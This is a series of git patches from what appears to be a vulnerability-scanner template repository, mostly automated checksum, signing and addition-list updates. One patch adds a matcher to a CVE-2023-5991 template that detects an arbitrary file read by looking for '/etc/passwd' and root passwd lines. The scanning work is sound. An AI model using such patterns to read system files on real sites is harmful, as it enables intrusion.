http/misconfiguration/glpi-directory-listing.yaml:29bb88890e78f83428d00799224679dfd993e1bc http/misconfiguration/gocd/gocd-cruise-configuration.yaml:36a522bd05c12da13079058f75e0d272007728a5 -http/misconfiguration/gocd/gocd-encryption-key.yaml:b5515851c8e9d9819cbf17b6d7eb42437a00ebc6 -http/misconfiguration/gocd/gocd-unauth-dashboard.yaml:5511df1524242c7128bd033238a4dae5db3fb86a +http/misconfiguration/gocd/gocd-encryption-key.yaml:be6a8821d31748cd4dd513aa480f85039b05f505 +http/misconfiguration/gocd/gocd-unauth-dashboard.yaml:c147aedb86f9e6b5fba3dcecee97560c2fc935ad http/misconfiguration/google/insecure-firebase-database.yaml:9b13af3f5222a4143b0d4075bd1eeb391709de4f http/misconfiguration/gopher-server.yaml:049ecafed940f9efdec3f7ea458fb6f516e22238 http/misconfiguration/grafana-public-signup.yaml:0ca43758c6cefb8473b88d8799dc8083bbdb4b09 @@ -8526,7 +8526,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:fde380a18fd424d1fb883d41dda45c0b95784e5c +templates-checksum.txt:1a90b7583a5d6ac8cd49a5788f3fbb4f624f292c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 27baf16c925503b4c4aeb6486b69fc08ac1173f2 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Wed, 15 May 2024 03:00:50 +0300 Subject: [PATCH 293/375] Update kiwitcms-json-rpc.yaml --- http/vulnerabilities/other/kiwitcms-json-rpc.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/vulnerabilities/other/kiwitcms-json-rpc.yaml b/http/vulnerabilities/other/kiwitcms-json-rpc.yaml index d68f6b0308..6c86c20395 100644 --- a/http/vulnerabilities/other/kiwitcms-json-rpc.yaml +++ b/http/vulnerabilities/other/kiwitcms-json-rpc.yaml @@ -11,7 +11,7 @@ info: - https://github.com/act1on3/nuclei-templates/blob/master/vulnerabilities/kiwi-information-disclosure.yaml metadata: max-request: 1 - shodan-query: title:"Kiwi TCMS - Login",http.favicon.hash:-1909533337 + shodan-query: title:"Kiwi TCMS - Login" http.favicon.hash:-1909533337 tags: kiwitcms,exposure,misconfig,hackerone http: @@ -44,4 +44,4 @@ http: part: body json: - .result[].username -# digest: 490a0046304402206498b9c98e30e36688f5ed44b4b119d5dd1ccf445adb66e57f7430c853526cd2022017c30c42721f5093f153a99b3600c36db25acd2c54a4141e2e0922f0da109afa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206498b9c98e30e36688f5ed44b4b119d5dd1ccf445adb66e57f7430c853526cd2022017c30c42721f5093f153a99b3600c36db25acd2c54a4141e2e0922f0da109afa:922c64590222798bb761d5b6d8e72950 From 7ee8f470002e842aadc57ff742a1e53e3b426b8b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 15 May 2024 00:01:32 +0000 Subject: [PATCH 295/375] Auto Generated Templates Checksum [Wed May 15 00:01:32 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6c374011ea..4a813a9a94 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -7756,7 +7756,7 @@ http/vulnerabilities/other/kingdee-eas-directory-traversal.yaml:2d4acac5bff94a82 http/vulnerabilities/other/kingdee-erp-rce.yaml:cdbd8bc5ade00ea67e803b32e5ce9b9ee954cab6 http/vulnerabilities/other/kingsoft-v8-file-read.yaml:f1424aa109595b203a05d0c6b3b181ee3faf709e http/vulnerabilities/other/kingsoft-vgm-lfi.yaml:920908a692b3c70d355b35dc730c20153f2f10c2 -http/vulnerabilities/other/kiwitcms-json-rpc.yaml:e8b89bed712fc69f4294693e5af6f7a35fc3c2d0 +http/vulnerabilities/other/kiwitcms-json-rpc.yaml:2f05c95ba761238790587d999ea131af5c9c0333 http/vulnerabilities/other/kodak-network-lfi.yaml:757f58aaa5d6318a5e343fee5fe250600bf82174 http/vulnerabilities/other/kyocera-m2035dn-lfi.yaml:ca4f7ab98104202417a24bfe05ccce4d9d63d18e http/vulnerabilities/other/landray-oa-datajson-rce.yaml:c62e0ed298fd046d8b4b307bbab0f990535dac24 @@ -8526,7 +8526,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:1a90b7583a5d6ac8cd49a5788f3fbb4f624f292c +templates-checksum.txt:45807b999fa7226e798407d410ef0cfdc28ecf6f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 30ca90a78887a79d86badbc6bd559a8067a7ab49 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 15 May 2024 00:02:13 +0000 Subject: [PATCH 296/375] Auto Template Signing [Wed May 15 00:02:13 UTC 2024] :robot: --- http/cves/2021/CVE-2021-43287.yaml | 2 +- http/exposed-panels/kiwitcms-login.yaml | 2 +- http/misconfiguration/gocd/gocd-cruise-configuration.yaml | 2 +- http/misconfiguration/gocd/gocd-unauth-dashboard.yaml | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/http/cves/2021/CVE-2021-43287.yaml b/http/cves/2021/CVE-2021-43287.yaml index e8a9f41d78..57168e57b4 100644 --- a/http/cves/2021/CVE-2021-43287.yaml +++ b/http/cves/2021/CVE-2021-43287.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204609e2e1895643baf7cdc7ad60281688e3476109ccc5ce2ccb2cf0270ebfbfc5022019685f6fa856fe84479cc12e3f1f631a79582a35c1f30fb624a042c867cad5c7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d0200eeb5397b87ed805111ba73b1f44e9e642500d7a6b71f5b6a960dc8d1549022050d924940eadf44a9064cfa5bcaa5f15133215a9364c377111696b5ac33dd637:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/kiwitcms-login.yaml b/http/exposed-panels/kiwitcms-login.yaml index 6f1a03b92d..eb09c731fe 100644 --- a/http/exposed-panels/kiwitcms-login.yaml +++ b/http/exposed-panels/kiwitcms-login.yaml @@ -33,4 +33,4 @@ http: group: 1 regex: - "Version ([0-9.]+)" -# digest: 4a0a0047304502204970f122554d53140cadb0128e08750a33a2fa84fc89d097f5af68e1bfb2eb16022100cd6eb7291e86d5379a54e26a5c5d3abcd4ff5c0f505858a409d2b4da17d521f7:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c7e0445fb0c4273073704f89e15d3964d3730fa6c57a6d21ae98ba39406c076102210096a4c3868ade5124d38d7a8312bcbd096227b224884baaef2d97163e6b82c9f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/gocd/gocd-cruise-configuration.yaml b/http/misconfiguration/gocd/gocd-cruise-configuration.yaml index cf581b6731..d86c079492 100644 --- a/http/misconfiguration/gocd/gocd-cruise-configuration.yaml +++ b/http/misconfiguration/gocd/gocd-cruise-configuration.yaml @@ -31,4 +31,4 @@ http: - "webhookSecret" - "tokenGenerationKey" condition: and -# digest: 4a0a0047304502200d2fd1e9ecc4854d8aa9b0188c42e1c8a4dab6cf811a1c1b0ddefca324d1de1c02210084d971bcf96b13508ede2ea3a0c92d437bdfc34c2d22d5ea4437328690cec9e1:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ac29afb87fd8ac872a0f7b942535bb3bf817074b934908847e337261e4192e3b022032bf9074f738ea01957b605f5c88f68efad27b85ab8d69ecb23fc5d0b0f73193:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml b/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml index 7bf379bbc8..3759aa334e 100644 --- a/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml +++ b/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022039ea9bdb750a12ccc3a1ed4f126dc46e57f112649d35b2ed182a654a048ea4ad022100d4c117105dea72d50f8721c3c173dc0dd54cac8ffa896fd7f2ef5b4525f1f90a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205138b757ccc0742d887b97717a06383dd5ccfe5f0394ff3c193c4be652028887022100b791a416ff7c1da55813e25fbaed8b33cc7cc08e1d599a7a1bd42f10131ffacc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 1fc431851837770bd917879e4812a100c1b5e374 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 15 May 2024 09:15:59 +0530 Subject: [PATCH 297/375] added header matcher --- http/cves/2023/CVE-2023-5991.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-5991.yaml b/http/cves/2023/CVE-2023-5991.yaml index 1f67bfe17d..19a6788590 100644 --- a/http/cves/2023/CVE-2023-5991.yaml +++ b/http/cves/2023/CVE-2023-5991.yaml @@ -8,8 +8,8 @@ info: The Hotel Booking Lite WordPress plugin before 4.8.5 does not validate file paths provided via user input, as well as does not have proper CSRF and authorisation checks, allowing unauthenticated users to download and delete arbitrary files on the server remediation: Fixed in 4.8.5 reference: - - https://nvd.nist.gov/vuln/detail/CVE-2023-5991 - https://wpscan.com/vulnerability/e9d35e36-1e60-4483-b8b3-5cbf08fcd49e/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-5991 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -39,6 +39,13 @@ http: regex: - "root:.*:0:0:" + - type: word + part: header + words: + - "filename=" + - "/etc/passwd" + condition: and + - type: status status: - 200 From 23b7c6b2624a66fdf30a69d1ba2a2745272476ef Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 15 May 2024 09:19:56 +0530 Subject: [PATCH 298/375] fix FN matchers --- http/exposed-panels/tiny-rss-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/tiny-rss-panel.yaml b/http/exposed-panels/tiny-rss-panel.yaml index 460457f73e..456deebdd8 100644 --- a/http/exposed-panels/tiny-rss-panel.yaml +++ b/http/exposed-panels/tiny-rss-panel.yaml @@ -23,5 +23,5 @@ http: - type: dsl dsl: - 'status_code==200' - - 'contains_all(body, "Tiny Tiny RSS", "ttrss_login", "ttrss_utility")' + - 'contains_any(body, "Tiny Tiny RSS", "ttrss_login", "ttrss_utility")' condition: and From 2e068670ecd6000fb3a39f61c7c0777f517cf082 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 15 May 2024 03:51:21 +0000 Subject: [PATCH 299/375] Auto Generated New Template Addition List [Wed May 15 03:51:21 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index fc4f5ccf95..4f685204f5 100644 --- a/.new-additions +++ b/.new-additions @@ -2,6 +2,7 @@ http/cnvd/2017/CNVD-2017-06001.yaml http/cves/2023/CVE-2023-36347.yaml http/cves/2023/CVE-2023-43374.yaml http/cves/2023/CVE-2023-45855.yaml +http/cves/2023/CVE-2023-5991.yaml http/cves/2024/CVE-2024-0200.yaml http/default-logins/softether/softether-vpn-default-login.yaml http/exposed-panels/ackee-panel.yaml From 6a01626553117949c0ccf86b7354f55793fe4a52 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 15 May 2024 03:51:27 +0000 Subject: [PATCH 300/375] Auto Generated Templates Checksum [Wed May 15 03:51:27 UTC 2024] :robot: --- templates-checksum.txt | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4a813a9a94..8896da7b8b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2349,7 +2349,7 @@ http/cves/2021/CVE-2021-42663.yaml:f3023c6a997a0d8027972baaaf23a96c5c8e884b http/cves/2021/CVE-2021-42667.yaml:c19169cb40060f91bb99ef5323b157fa0fbf6297 http/cves/2021/CVE-2021-42887.yaml:dfe8d47da07a7c37b5294acdd283c4c27dbdf753 http/cves/2021/CVE-2021-43062.yaml:a2a6ba5ec2ce275fa2ffbb6b19af1b20dfc0a0c3 -http/cves/2021/CVE-2021-43287.yaml:86d4216d1418d3ee400ea98a2aa9ff407d4c7db0 +http/cves/2021/CVE-2021-43287.yaml:924e0ab303bf4959fb489490c4a5592747b44abe http/cves/2021/CVE-2021-43421.yaml:d3b512996e80ab08eaec03df406c88aa78376ac9 http/cves/2021/CVE-2021-43495.yaml:7976f205a306ddb65f565049e3f4451bd9a5ce92 http/cves/2021/CVE-2021-43496.yaml:1241385fad2c3dee60c598304d8dc5b177d94c32 @@ -3207,6 +3207,7 @@ http/cves/2023/CVE-2023-5375.yaml:1a1f06afcd795e901f9320cb7eafed3583078598 http/cves/2023/CVE-2023-5556.yaml:39a19e3bf6a7d46ee8f9d2550dfe7ed8f3ba2413 http/cves/2023/CVE-2023-5830.yaml:7e762d6ffa5d98900695ddf94f70b095cd54ee62 http/cves/2023/CVE-2023-5914.yaml:e569de3f31b3f9b4affbeac019dc42e7e4b6a0a3 +http/cves/2023/CVE-2023-5991.yaml:871deadbd3965017d7c7b89260f1aa42dd1b916c http/cves/2023/CVE-2023-6018.yaml:eb0a236252c640180f594627bfb873c35a398fd6 http/cves/2023/CVE-2023-6020.yaml:bb2f91071bd7ca0a284f7a15d68288e499f1f427 http/cves/2023/CVE-2023-6021.yaml:600bdb52150fc4bfebfd9c76945beb2ab94e7600 @@ -3981,7 +3982,7 @@ http/exposed-panels/kfm/kaes-file-manager.yaml:163a84373e69e74099b9f771341054ad2 http/exposed-panels/kfm/kfm-login-panel.yaml:d86163cf22c63d250566759202ef64092196705f http/exposed-panels/kibana-panel.yaml:ab4bffa526cbad54f4b8abf2bc46f5ddc1e4a284 http/exposed-panels/kiteworks-pcn-panel.yaml:8eb88c7a52943afd620e5f92e0f12ea4b2fdef16 -http/exposed-panels/kiwitcms-login.yaml:12c42952a2be760b44850a50bf8f8e571a20d610 +http/exposed-panels/kiwitcms-login.yaml:e64ae1148fd5fab74c8ea15391bca33551139c2a http/exposed-panels/kkfileview-panel.yaml:c42a91ee90824170f94bcaaf4a396e33f8d1420b http/exposed-panels/klr300n-panel.yaml:3e7feed65269887a82bdab5a4971d4748236fdcd http/exposed-panels/kodak-network-panel.yaml:ff5ef39f196e3dcec90c1df4f05cee3b70ffa854 @@ -5332,9 +5333,9 @@ http/misconfiguration/gitlab/gitlab-user-enum.yaml:09ffd851b3108524029e04ca4f1a5 http/misconfiguration/gitlist-disclosure.yaml:8111ac3c10bc09b42d9c2bc565cd5758cb6a220e http/misconfiguration/global-traffic-statistics.yaml:f5ab7750ae4d32d8b857b8290bcd98ac1358fa0d http/misconfiguration/glpi-directory-listing.yaml:29bb88890e78f83428d00799224679dfd993e1bc -http/misconfiguration/gocd/gocd-cruise-configuration.yaml:36a522bd05c12da13079058f75e0d272007728a5 +http/misconfiguration/gocd/gocd-cruise-configuration.yaml:afd6d002fdf184b81dc31d6774f5cf44c9949dba http/misconfiguration/gocd/gocd-encryption-key.yaml:be6a8821d31748cd4dd513aa480f85039b05f505 -http/misconfiguration/gocd/gocd-unauth-dashboard.yaml:c147aedb86f9e6b5fba3dcecee97560c2fc935ad +http/misconfiguration/gocd/gocd-unauth-dashboard.yaml:21d7318675025f7ca3566b9eb3c054fc7da276a4 http/misconfiguration/google/insecure-firebase-database.yaml:9b13af3f5222a4143b0d4075bd1eeb391709de4f http/misconfiguration/gopher-server.yaml:049ecafed940f9efdec3f7ea458fb6f516e22238 http/misconfiguration/grafana-public-signup.yaml:0ca43758c6cefb8473b88d8799dc8083bbdb4b09 @@ -8526,7 +8527,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:45807b999fa7226e798407d410ef0cfdc28ecf6f +templates-checksum.txt:59d48d7b53ac4588e8751e9beee90475b1e6e9d3 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d858e4780e7ac8a6e5c2ad3e24383151e04ccbb1 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 15 May 2024 03:52:02 +0000 Subject: [PATCH 301/375] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index b5b40de222..5e03e4d4dc 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -7,6 +7,7 @@ on: - 'http/cves/2023/CVE-2023-36347.yaml' - 'http/cves/2023/CVE-2023-43374.yaml' - 'http/cves/2023/CVE-2023-45855.yaml' + - 'http/cves/2023/CVE-2023-5991.yaml' - 'http/cves/2024/CVE-2024-0200.yaml' - 'http/default-logins/softether/softether-vpn-default-login.yaml' - 'http/exposed-panels/ackee-panel.yaml' From 998b57391ee5e139144d0381411231ad82f44f66 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 15 May 2024 03:53:18 +0000 Subject: [PATCH 302/375] Auto Template Signing [Wed May 15 03:53:18 UTC 2024] :robot: --- http/cves/2023/CVE-2023-5991.yaml | 1 + http/vulnerabilities/other/kiwitcms-json-rpc.yaml | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-5991.yaml b/http/cves/2023/CVE-2023-5991.yaml index 19a6788590..da1a165a5d 100644 --- a/http/cves/2023/CVE-2023-5991.yaml +++ b/http/cves/2023/CVE-2023-5991.yaml @@ -49,3 +49,4 @@ http: - type: status status: - 200 +# digest: 490a004630440220014d0afbf313c77eebbf17a87a636bfffda4e29359e40ad4ca50e421977f9c0f022049fddedfdc464a6562d4ed201b1cac4fb18011eeb933ff7d55619d9325b667ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/kiwitcms-json-rpc.yaml b/http/vulnerabilities/other/kiwitcms-json-rpc.yaml index 6c86c20395..9b5eab301c 100644 --- a/http/vulnerabilities/other/kiwitcms-json-rpc.yaml +++ b/http/vulnerabilities/other/kiwitcms-json-rpc.yaml @@ -44,4 +44,4 @@ http: part: body json: - .result[].username -# digest: 490a0046304402206498b9c98e30e36688f5ed44b4b119d5dd1ccf445adb66e57f7430c853526cd2022017c30c42721f5093f153a99b3600c36db25acd2c54a4141e2e0922f0da109afa:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e625a29f9198b07723d4e26329a8d2d947c7240aadf04e2859b0f6dff1acdead02200b19f7aac7e79222c4418add2934c0704dab1ee621e7b45540127028968ed156:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 028eb90871a6c2ca156df33f4b13f56faa4079f0 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 15 May 2024 03:54:54 +0000 Subject: [PATCH 303/375] Auto Generated New Template Addition List [Wed May 15 03:54:54 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 4f685204f5..25ef20c856 100644 --- a/.new-additions +++ b/.new-additions @@ -4,6 +4,7 @@ http/cves/2023/CVE-2023-43374.yaml http/cves/2023/CVE-2023-45855.yaml http/cves/2023/CVE-2023-5991.yaml http/cves/2024/CVE-2024-0200.yaml +http/cves/2024/CVE-2024-3097.yaml http/default-logins/softether/softether-vpn-default-login.yaml http/exposed-panels/ackee-panel.yaml http/exposed-panels/craftercms-panel.yaml From e57d0f14ae99396a9225d6ee0987caadbcfd93af Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 15 May 2024 03:54:59 +0000 Subject: [PATCH 304/375] Auto Generated Templates Checksum [Wed May 15 03:54:59 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8896da7b8b..1b944102f5 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3207,7 +3207,7 @@ http/cves/2023/CVE-2023-5375.yaml:1a1f06afcd795e901f9320cb7eafed3583078598 http/cves/2023/CVE-2023-5556.yaml:39a19e3bf6a7d46ee8f9d2550dfe7ed8f3ba2413 http/cves/2023/CVE-2023-5830.yaml:7e762d6ffa5d98900695ddf94f70b095cd54ee62 http/cves/2023/CVE-2023-5914.yaml:e569de3f31b3f9b4affbeac019dc42e7e4b6a0a3 -http/cves/2023/CVE-2023-5991.yaml:871deadbd3965017d7c7b89260f1aa42dd1b916c +http/cves/2023/CVE-2023-5991.yaml:2760a58a352d55a71ad7a177100f0513a82ed6c3 http/cves/2023/CVE-2023-6018.yaml:eb0a236252c640180f594627bfb873c35a398fd6 http/cves/2023/CVE-2023-6020.yaml:bb2f91071bd7ca0a284f7a15d68288e499f1f427 http/cves/2023/CVE-2023-6021.yaml:600bdb52150fc4bfebfd9c76945beb2ab94e7600 @@ -3278,6 +3278,7 @@ http/cves/2024/CVE-2024-2876.yaml:33b7f45b1e5e63e6936315618a667d8cd07d054b http/cves/2024/CVE-2024-2879.yaml:b49dbdd0903b4812334dfdb5d99c2c128b750841 http/cves/2024/CVE-2024-29059.yaml:e58644b7fabb2b313e0232a6d9eaffbebb7f498a http/cves/2024/CVE-2024-29269.yaml:c36e5f4c5cebb6a3a60a4c5228dd5a823482e8cc +http/cves/2024/CVE-2024-3097.yaml:774f7a0efb9b68a93dfda3f53418fcb4f23af138 http/cves/2024/CVE-2024-3136.yaml:5fed158063381326ca7336af0dc0c43ed317883d http/cves/2024/CVE-2024-31621.yaml:d0336b01545c56f67a5ee9a174f52e660861e3bc http/cves/2024/CVE-2024-31848.yaml:0d6172ae416d3a1de4e4cabcccdb4e102f2ca440 @@ -7757,7 +7758,7 @@ http/vulnerabilities/other/kingdee-eas-directory-traversal.yaml:2d4acac5bff94a82 http/vulnerabilities/other/kingdee-erp-rce.yaml:cdbd8bc5ade00ea67e803b32e5ce9b9ee954cab6 http/vulnerabilities/other/kingsoft-v8-file-read.yaml:f1424aa109595b203a05d0c6b3b181ee3faf709e http/vulnerabilities/other/kingsoft-vgm-lfi.yaml:920908a692b3c70d355b35dc730c20153f2f10c2 -http/vulnerabilities/other/kiwitcms-json-rpc.yaml:2f05c95ba761238790587d999ea131af5c9c0333 +http/vulnerabilities/other/kiwitcms-json-rpc.yaml:ce6d41bfb15c8218ccb1a6102888c78db08e4224 http/vulnerabilities/other/kodak-network-lfi.yaml:757f58aaa5d6318a5e343fee5fe250600bf82174 http/vulnerabilities/other/kyocera-m2035dn-lfi.yaml:ca4f7ab98104202417a24bfe05ccce4d9d63d18e http/vulnerabilities/other/landray-oa-datajson-rce.yaml:c62e0ed298fd046d8b4b307bbab0f990535dac24 @@ -8527,7 +8528,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:59d48d7b53ac4588e8751e9beee90475b1e6e9d3 +templates-checksum.txt:1b50b4125ef938d3ca75976b6462aab4643af44b wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 130ab0e0e271a17d58ec498329b817b9094f2f35 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 15 May 2024 03:55:34 +0000 Subject: [PATCH 305/375] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 5e03e4d4dc..ea22d0de4b 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -9,6 +9,7 @@ on: - 'http/cves/2023/CVE-2023-45855.yaml' - 'http/cves/2023/CVE-2023-5991.yaml' - 'http/cves/2024/CVE-2024-0200.yaml' + - 'http/cves/2024/CVE-2024-3097.yaml' - 'http/default-logins/softether/softether-vpn-default-login.yaml' - 'http/exposed-panels/ackee-panel.yaml' - 'http/exposed-panels/craftercms-panel.yaml' From 1a74b478aa84d00610ad38b29bcfa28664714b1d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 15 May 2024 03:56:44 +0000 Subject: [PATCH 306/375] Auto Template Signing [Wed May 15 03:56:44 UTC 2024] :robot: --- http/cves/2024/CVE-2024-3097.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-3097.yaml b/http/cves/2024/CVE-2024-3097.yaml index d8356d638a..4c3d3c3a57 100644 --- a/http/cves/2024/CVE-2024-3097.yaml +++ b/http/cves/2024/CVE-2024-3097.yaml @@ -48,3 +48,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100d937a4e33ba274ac20f1c8201f9a5ec5053252381b066f6ca34efbb0357112c5022100c5aa25daa1dcadea9076b1bfd0c414c26fd500c71e46d3e56461e1ef6be67149:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From cbbf0399ce12993e42e1bab0102c7122f6df5098 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 15 May 2024 03:57:03 +0000 Subject: [PATCH 307/375] Auto Generated New Template Addition List [Wed May 15 03:57:03 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 25ef20c856..739939780e 100644 --- a/.new-additions +++ b/.new-additions @@ -15,6 +15,7 @@ http/exposed-panels/n8n-panel.yaml http/exposed-panels/nocodb-panel.yaml http/exposed-panels/pocketbase-panel.yaml http/exposed-panels/qlikview-accesspoint-panel.yaml +http/exposed-panels/tiny-rss-panel.yaml http/exposed-panels/unleash-panel.yaml http/honeypot/tpot-honeypot-detect.yaml http/misconfiguration/installer/moosocial-installer.yaml From 32b0128c6e88a0488f94089c2833548957df6685 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 15 May 2024 09:27:10 +0530 Subject: [PATCH 308/375] fix FN matchers --- http/exposed-panels/cacti-panel.yaml | 11 ++++------- 1 file changed, 4 insertions(+), 7 deletions(-) diff --git a/http/exposed-panels/cacti-panel.yaml b/http/exposed-panels/cacti-panel.yaml index f15f6bb24b..26155bc361 100644 --- a/http/exposed-panels/cacti-panel.yaml +++ b/http/exposed-panels/cacti-panel.yaml @@ -12,12 +12,13 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 2 product: cacti vendor: cacti shodan-query: http.favicon.hash:-1797138069 fofa-query: icon_hash="-1797138069" - tags: tech,cacti,login,panel + tags: cacti,login,panel,detect http: - method: GET @@ -27,18 +28,14 @@ http: stop-at-first-match: true - matchers-condition: and + matchers-condition: or matchers: - - type: status - status: - - 200 - - type: word part: body words: - "Login to Cacti" - "The Cacti Group" - condition: and + condition: or - type: regex part: header From 020110bbf38782db0f20328885338caa4495bc52 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 15 May 2024 03:57:17 +0000 Subject: [PATCH 309/375] Auto Generated Templates Checksum [Wed May 15 03:57:17 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 1b944102f5..b167fe10d0 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4439,6 +4439,7 @@ http/exposed-panels/tibco-spotfire-panel.yaml:7abc1e8affa4065623831a8dfa9ebcc5f3 http/exposed-panels/tigase-xmpp-server.yaml:75dcbfb91190aa716fb8894a26fad88ebcf1c4b4 